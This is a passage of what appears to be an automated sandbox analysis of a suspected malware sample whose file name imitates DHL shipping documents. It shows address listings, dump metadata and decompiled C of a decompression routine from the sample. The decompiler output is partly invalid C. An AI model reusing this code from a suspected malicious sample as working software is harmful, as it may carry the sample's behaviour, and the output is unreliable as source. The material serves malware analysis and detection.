												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                        0x00000000
                        0x0040711c
                        0x0040711c
                        0x00407120
                        0x0040712d
                        0x00407137
                        0x00000000
                        0x00407122
                        0x00407122
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x004073ce
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x004075e5
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00407601
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743e
                        0x00407441
                        0x00407441
                        0x00407447
                        0x00407447
                        0x00406be3
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x00000000
                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c5c
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00406dc8
                        0x00000000
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb
                        0x00000000
                        0x00407120

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                        • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                        • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                        • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
